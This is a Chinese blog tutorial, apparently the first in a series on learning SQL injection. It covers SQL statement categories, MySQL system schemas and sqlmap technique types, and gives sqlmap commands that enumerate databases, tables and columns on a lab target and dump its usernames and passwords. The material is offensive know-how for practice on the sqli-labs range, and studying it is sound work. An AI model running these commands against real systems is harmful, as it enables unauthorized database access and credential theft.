学习SQL注入系列篇(1)

最新推荐文章于 2024-09-04 18:23:01 发布
最新推荐文章于 2024-09-04 18:23:01 发布
阅读量6.8k 收藏
点赞数
分类专栏: 渗透测试 文章标签: SQL注入 SQLmap 数据库信息 盲注 安全防护
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38986854/article/details/123979965
版权

文章目录

SQL注入原理和流程

SQL类型

  • DQL:数据查询语言(select)
  • DML:数据操作语言(insert, update, delete)
  • DDL:数据定义语言(create, drop, alter)
  • DCL:数据控制语言(grant, revoke, commit, rollback)
  • 函数:字符串函数、数字函数、日期函数
  • 运算符:算术运算符、比较运算符、逻辑运算符、位运算符

获取数据库信息

  • show命令
  • select + 函数
  • 系统库

系统库

系统库描述
information_schemaMySQL服务器所有数据库的信息
mysql基存储数据库的用户、权限设置、关键字等
performance_schema主要用于收集数据库服务器性能参数
sys数据来自performance_schema

SQL注入工具

sqlmap

类型描述
boolean-based blind基于Boolean的盲注
time-based blind基于时间的盲注
error-based基于报错
UNION query-based基于联合查询
stacked queries基于多条SQL语句(堆叠注入)
out-of-band(OOB)非应用内通信注入,比如DNSLog

1. SQLmap常用命令使用

sqlmap -u  http://192.168.2.200/url.php?id=1
sqlmap -u  "http://192.168.2.200/url.php?id=1" --current-db
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbs
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security"  --tables
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security" -T "users"  --col
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security" -T "users" -C "password,username" --dump

靶场: sqli-labs
支持php7的代码链接地址: sqli_labs_sqli-version

DevSecOps云原生LYJ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
〖Python 数据库开发实战 - Python与MySQL交互②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
SQL注入学习资料总结
墨痕诉清风的博客
05-13 726
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的。
漏洞SQL注入一)
m0_58001548的博客
03-26 1242
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
SQL注入:二次注入
qq_68163788的博客
01-29 2171
二次注入是SQL注入攻击的一种变体,它发生在应用程序对用户输入进行了过滤和防御措施的情况下。在这种情况下,攻击者可能会利用应用程序中的另一个漏洞,例如存储型XSS漏洞,来注入恶意的SQL代码。这种情况下,攻击者利用应用程序中的另一个漏洞来实现对数据库的注入攻击,因此被称为二次注入。 要防止二次注入攻击,开发人员需要实施全面的安全措施,包括对用户输入进行严格的验证和过滤,使用参数化查询或者存储过程等安全的数据库访问方法,以及定期进行安全审计和漏洞扫描。
网络安全筑基——SQL注入
weixin_55762309的博客
06-17 1284
SQL(Structured Query Language,结构化查询语言)是一种用于管理关系型数据库系统的语言,它可以用于创建、修改和删除数据库中的表和记录,以及执行查询操作。简单易学:SQL语法相对简单,易于理解和学习。高效灵活:SQL可以执行快速和复杂的数据库操作,如插入、更新、删除和查询。标准化:SQL是一种标准化的语言,大多数关系型数据库系统都支持SQL。表达能力强:SQL支持各种复杂的查询和数据操作,可以根据需要进行数据的筛选、排序、合并等操作。
注入之SQL注入1
bwxzdjn的博客
03-18 1221
用实验案例的形式记录SQL注入按照注入点类型分类的三大基础注入形式:数字型注入、字符型注入和搜索型注入,采用手工注入的方法了解SQL注入的基本原理
SQL注入:报错注入
qq_68163788的博客
01-27 2093
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
渗透学习-SQL注入-基础知识的学习(持续更新中)
qq_43696276的博客
04-30 2293
前言 一、SQL注入产生的原因 二、手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能够回显数据的地方: 4.信息收集、注入: 三、注入的大致分类 1.盲注 2、有关于http头部的注入 3、二次注入 4、宽字节注入 5、堆叠注入 6、order by 注入.........
关于sql注入这一就够了(适合入门)
qq_53105813的博客
01-07 5307
sql注入详解
自己动手编写SQL注入漏洞扫描工具
03-25
将探讨如何自己动手编写一个SQL注入漏洞扫描工具,通过分析提供的程序代码,我们可以了解基本的检测原理和技术。 首先,我们需要理解SQL注入的基本概念。当用户提交的数据被直接拼接到SQL查询中,而没有进行...
77.网络安全渗透测试—[SQL注入16]—[SQLSERVER+ASP-延时注入]
qwsn
01-19 4496
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 延时注入 1、简介 2、判断注入 3、猜解长度、个数、字符 4、以上总结:`12步` 5、思考1:`information_schema的区别` 6、思考2:`如何一次查询当前库的所有表长度` 7、简化延时注入步骤:`9步(省略了判断个数的步骤)`
Python知识点:如何使用Appium进行移动应用测试
bigorsmallorlarge的专栏
08-31 1451
Appium 是一个开源的测试工具,用于自动化移动应用的测试。它支持多种平台,如Android和iOS。以下是使用Appium进行移动应用测试的详细指南。
SpringMVC入门
qq_69907434的博客
09-02 1214
Spring Web MVC是一种基于Java的实现了Web MVC设计模式的请求驱动类型的轻量级Web 框架,即使用了MVC架构模式的思想,将web 层进行职责解耦,基于请求驱动指的就是使用请求-响应模型,框架的目的就是帮助我们简化开发,Spring Web MVC也是要简化我们日常Web开发的。3、拦截所有,设置为/*,此设置方法错误,因为请求到Action,当action转到jsp时再次被拦截, 提示不能根据jsp路径mapping成功。
Java MVC
小小前端转型中
09-04 437
JavaBean:符合特定规范的Java类,是一种可重用的组件。
深入探讨MySQL的MVCC机制
weixin_40381772的博客
09-04 982
InnoDB存储引擎通过维护数据行的隐藏字段、使用系统版本号、管理Undo Log、构建Read View、区分锁定读和一致性非锁定读、定期进行版本回收以及支持特定的事务隔离级别等多种机制,实现了MVCC。这些机制共同作用,使得InnoDB能够有效地支持MVCC,从而实现了高效的并发控制和数据一致性保证。
Python知识点:如何使用Pytest进行单元测试
码农超哥的博客
09-01 643
通过Pytest进行单元测试是一种高效且易于扩展的方式。其简洁的语法和丰富的功能(如Fixture、参数化测试、报告生成)让你能够快速编写、运行和维护高质量的测试套件。
Vue面试常见知识总结2——spa、vue按需加载、mvc与mvvm、vue的生命周期、Vue2与Vue3区别
警警的博客
08-31 2344
spa、vue按需加载、mvc与mvvm、vue的生命周期、Vue2与Vue3区别
【项目一】基于pytest的自动化测试框架day1
最新发布
weixin_45962681的博客
09-04 929
例如,使用python的requests库,可以轻松地编写自动化测试脚本,并将这些脚本集成到持续集成(CI)系统中,如Jenkins、GitLab CI等。通过CI,我们可以设定每日定时执行测试,并将测试结果推送到团队的沟通工具(如钉钉、Slack)中,确保所有成员都能及时了解到项目的健康状态。例如,Jenkins 是一个广泛使用的 CI/CD 工具,它可以自动化地构建、测试和部署代码。自动化测试的实现通常是将手动测试的步骤脚本化,并在代码中实现。接口测试的第一步,从来都是获取接口文档。
理解SQL注入:网络安全技术解析
资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库中的数据或者获取未经授权的信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

DevSecOps云原生LYJ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值